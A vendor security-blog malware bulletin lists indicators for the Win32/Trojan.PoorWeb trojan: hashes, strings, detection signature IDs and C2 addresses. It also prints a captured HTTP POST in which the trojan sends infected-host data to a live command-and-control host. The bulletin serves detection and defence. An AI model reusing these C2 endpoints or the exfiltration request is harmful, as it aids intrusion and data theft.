Wins blog

글로벌 정보보안 파트너! Global Security  No.1 윈스는 국가대표 정보보안 기업에서 글로벌 강소기업으로 도약합니다.

보안 정보

앞 내용 보기 다음 내용 보기
악성코드 정보[Malware Info] Win32/Trojan.PoorWeb
작성일 2018-10-12 조회 445

 

 

ㅁ Malware IoC

 

  Pattern    Win32/Trojan.PoowWeb
  Filename    -
  Type    PE (exe)
  Size    41,472 bytes
  MD5    d37124b137c2087d7a908fd136a4866e

 

 

  Pattern    Win32/Trojan.PoowWeb
  Filename    -
  Type    PE (exe)
  Size    39,936 bytes
  MD5    6900bbd0b505126c4461ae21bb4cf85d

 

 

 

ㅁ Malware Traffic

 

POST /skin15/include/bin/forlab.php HTTP/1.1

Host: youngs.dgweb.kr:80

Content-type: multipart/form-data;boundary=-----------------------------000610c004914

Content-Length: 1145

 

-------------------------------000610c004914

Content-Disposition: multipart/form-data; name="kind"

 

u

-------------------------------000610c004914

Content-Disposition: multipart/form-data; name="fname"; filename="000c29659d890000"

 

P...BX....)e........youngs.dgweb.kr.............../skin15/include/bin/forlab.php...........

 

[감염 단말 정보]

-------------------------------000610c004914--


 

 

ㅁ Malware String

 

 - hdevmng.exe
 - Alibaba.exe
 - God2me
 - 9g8u4_55559y(ighiserh5)
 - youngs.dgweb.kr

 

 

ㅁ Malware C2

 
 - youngs[.]dgweb[.]kr:80/skin15/include/bin/forlab.php 

 - 211[.]218[.]126[.]236/ct/data/icon/files/goal.php?miracles=1

 - 211[.]218[.]126[.]236/ct/data/icon/files/goal.php?miracles=2

 

 

 

ㅁ Malware Hash

 

 - 74BF82F2FAA1FCE36A8F3509B20FF30AA055911CF78EAC51181644D2BEB10B33
 - 002132D1AACD5F8DCD28FAC86BD25C2EE666B4726DED3E263F43482E1436A1A7
 - D057088D0DE3D920EA0939217C756274018B6E89CBFC74F66F50A9D27A384B09
 - 26B8951C0979286D2994C115B06D7A28C0DB67432809B32CCF5FCB2199576641

 

ㅁ Wins Sniper Pattern

 

 - [4508] Win32/Trojan.PoorWeb.41472

 - [4509] Win32/Trojan.PoorWeb.39936

 - [4508] Win32/Trojan.PoorWeb.Connection

 

 

 

 

 

 

Source

https://www.virustotal.com/#/file/d9a967d0caa8db86feca3ae469ef6797e81dfdac4d8531658cb242a87c80ce05/detection

첨부파일 첨부파일이 없습니다.
태그 Malware Info  Trojan  PoorWeb